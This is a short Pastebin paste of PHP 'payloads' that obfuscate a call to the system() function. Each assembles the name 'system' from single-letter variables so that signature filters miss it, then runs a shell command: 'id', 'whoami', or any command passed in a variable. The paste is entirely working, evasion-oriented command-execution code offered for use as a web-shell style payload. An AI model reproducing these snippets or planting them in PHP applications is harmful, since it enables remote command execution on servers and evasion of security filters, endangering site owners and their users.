ardann

Manipulation Function in PHP

Nov 27th, 2018
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.42 KB | None | 0 0
  1. // payload created by Ardzz <3
  2. <?php $a="s";$b="y";$c="s";$d="t";$e="e";$f="m";$g=$a.$b.$c.$d.$e.$f;$h="i";$i="d";$g($h.$i);?> // print id of current user
  3. <?php $a="s";$b="y";$c="s";$d="t";$e="e";$f="m";$g=$a.$b.$c.$d.$e.$f;$h="w";$i="h";$j="o";$k="a";$l="m";$m="i";$g($h.$i.$j.$k.$l.$m);?> // print current user
  4. <?php $a="s";$b="y";$c="s";$d="t";$e="e";$f="m";$g=$a.$b.$c.$d.$e.$f;$g($your_command);?> // call function system()
Advertisement
Add Comment
Please, Sign In to add comment